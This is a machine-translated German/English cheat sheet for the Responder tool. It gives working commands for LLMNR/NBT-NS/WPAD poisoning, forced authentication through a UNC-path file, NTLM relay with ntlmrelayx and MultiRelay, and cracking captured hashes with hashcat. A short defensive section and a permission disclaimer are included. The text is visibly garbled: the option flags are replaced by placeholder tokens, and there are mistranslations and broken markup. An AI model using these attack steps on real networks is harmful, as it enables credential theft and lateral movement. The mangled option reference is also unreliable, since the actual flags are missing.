_# Responder Cheat Sheet

_ 📋 Kopie Alle Befehle 📄 Erstellen von PDF_HTML_TAG_58____

Im Überblick

Responder ist ein leistungsstarker LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service) und MDNS (Multicast DNS) Gifter. Es ist konzipiert, um auf bestimmte Netzwerknamen-Auflösungsabfragen zu reagieren und beinhaltet integrierte HTTP/SMB/MSSQL/FTP/LDAP Rogue-Authentifizierungsserver, die die NTLMv1/NTLMv2/LMv2 Authentifizierung unterstützen.

ZEITSCHRIFTEN Warning: Responder ist ein Sicherheitstest-Tool, das nur in Umgebungen verwendet werden sollte, in denen Sie eine ausdrückliche Erlaubnis dazu haben.

• Installation

Das ist der Grund.

# Update package list
sudo apt update

# Install if not already installed
sudo apt install responder
```_

### From GitHub
```bash
# Clone the repository
git clone https://github.com/lgandx/Responder

# Navigate to the directory
cd Responder

# Make the Python script executable
chmod +x Responder.py
```_

### Verwenden von pip
```bash
# Install using pip
pip install Responder
```_

oder Basisnutzung

### Starting Responder
```bash
# Basic usage with interface specification
responder -I eth0

# Start with all options enabled
responder -I eth0 -wrf

# Analyze mode (passive)
responder -I eth0 -A
```_

Befehlszeilenoptionen

|Option|Description|
|--------|-------------|
|__INLINE_CODE_21__|Show help message and exit|
|__INLINE_CODE_22__|Analyze mode. Do not poison any requests, just analyze traffic|
|__INLINE_CODE_23__|Network interface to use|
|__INLINE_CODE_24__|IP address to bind to|
|__INLINE_CODE_25__|External IP address (for DHCP options)|
|__INLINE_CODE_26__|Return a Basic HTTP authentication. Default: NTLM|
|__INLINE_CODE_27__|Enable answers for netbios wredir suffix queries|
|__INLINE_CODE_28__|Enable answers for netbios domain suffix queries|
|__INLINE_CODE_29__|Fingerprint hosts that issued an NBT-NS or LLMNR query|
|__INLINE_CODE_30__|Start the WPAD rogue proxy server|
|__INLINE_CODE_31__|Upstream HTTP proxy used by the rogue WPAD proxy|
|__INLINE_CODE_32__|Force NTLM/Basic authentication on wpad.dat file retrieval|
|__INLINE_CODE_33__|Force NTLM/Basic authentication for any proxy request|
|__INLINE_CODE_34__|Force LM hashing downgrade for Windows XP/2003 and earlier|
|__INLINE_CODE_35__|Increase verbosity|
|__INLINE_CODE_36__|Log to file in addition to console|
|__INLINE_CODE_37__|Do not log to syslog|
|__INLINE_CODE_38__|Do not log to stdout|
|__INLINE_CODE_39__|Path to configuration file|
|__INLINE_CODE_40__|Enable/disable specific server (HTTP, SMB, etc.)|
|__INLINE_CODE_41__|Enable the MSSQL server|
|__INLINE_CODE_42__|Enable the MSSQL server|
|__INLINE_CODE_43__|Enable the HTTPS server|
|__INLINE_CODE_44__|Enable the HTTP server|
|__INLINE_CODE_45__|Enable the SMB server|
|__INLINE_CODE_46__|Enable the FTP server|
|__INLINE_CODE_47__|Enable the IMAP server|
|__INLINE_CODE_48__|Enable the POP server|
|__INLINE_CODE_49__|Enable the SMTP server|
|__INLINE_CODE_50__|Enable the LDAP server|
|__INLINE_CODE_51__|Enable the DNS server|

Datei konfigurieren

Die Konfigurationsdatei befindet sich bei __INLINE_CODE_52_ oder im Responder-Verzeichnis als `Responder.conf`_.

### Schlüsselkonfigurationsoptionen
```ini
[Responder Core]
; Set to On or Off to enable or disable features
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
```_

Angreifer Szenarien

### Basic LLMNR/NBT-NS-Vergiftung
```bash
# Start Responder with default settings
responder -I eth0 -v

# Wait for authentication attempts
# Hashes will be saved in the logs directory
```_

### Zwangsauthentifizierung über UNC Path
```bash
# Create a file with a UNC path
echo "file://<non-existent-share>/test.txt" > malicious.url

# Start Responder
responder -I eth0 -v

# When the victim opens the file, their system will attempt to authenticate
# Responder will capture the hash
```_

### WPAD Angriff
```bash
# Start Responder with WPAD enabled
responder -I eth0 -w -v

# When a victim's browser requests a WPAD configuration file
# Responder will respond and capture authentication attempts
```_

### Relay Attack Setup
```bash
# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb

# In another terminal, run ntlmrelayx
ntlmrelayx.py -t <target_ip> -smb2support
```_

Hash Capture and Cracking

### Viewing Captured Hashes
```bash
# View captured hashes
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt

# Format of captured hash
# USERNAME::DOMAIN:challenge:NTLM response:other data
```_

### Cracking with Hashcat
```bash
# Crack NTLMv2 hashes with hashcat
hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt /path/to/wordlist

# Crack NTLMv1 hashes with hashcat
hashcat -m 5500 /usr/share/responder/logs/SMB-NTLMv1-SSP-<IP>.txt /path/to/wordlist
```_

Fortgeschrittene Technologien

### Verwenden von Responder mit MultiRelay
```bash
# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb

# In another terminal, run MultiRelay
cd Responder/tools
python3 MultiRelay.py -t <target_ip> -u ALL
```_

### Vergiftung bestimmter Hosts
```bash
# Create a file with target IPs
echo "192.168.1.10" > targets.txt

# Start Responder with target file
responder -I eth0 -v -e targets.txt
```_

### Custom Challenge Value
```bash
# Edit Responder.conf and set a custom challenge
# [Responder Core]
# Challenge = 1122334455667788
```_

Defensive Maßnahmen

### Disabling LLMNR via Group Policy
ANHANG Open Group Policy Editor
2. Navigieren Sie zu Computerkonfiguration > Verwaltungsvorlagen > Netzwerk > DNS Auftraggeber
3. Enable "Turn off Multicast Name Auflösung"

### Disabling NBT-NS via Command Line
```bash
# Disable NBT-NS on Windows
netsh interface ipv4 set interface "Local Area Connection" nbtbios=disabled
```_

### Disabling NBT-NS via Registry

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\NodeType = 2 (P-node) ```_

Reponder-Aktivität erkennen

```bash

Monitor for suspicious LLMNR/NBT-NS responses

Look for multiple services running on the same IP

Check for unusual authentication attempts

```_

Fehlerbehebung

Häufige Fragen

ANHANG Port Konflikte ```bash # Check if ports are already in use netstat -tuln|grep -E '445|80|53'

# Kill conflicting processes sudo kill ```_

1. **Interface nicht gefunden* ```bash # List available interfaces ip a

# Use the correct interface name responder -I ```_

1. **Auftragsfragen* bash # Run with sudo sudo responder -I eth0_

2. ** Keine Hashes gefangen* bash # Check if Responder is running in analyze mode # Ensure the network allows the required traffic # Try forcing authentication with UNC paths_

Ressourcen

• (Official GitHub Repository)(https://github.com/lgandx/Responder)_
• MITRE ATT&CK - LLMNR/NBT-NS-Vergiftung
• Kali Linux Tools - Responder_

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Responder in Sicherheitstestszenarien. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *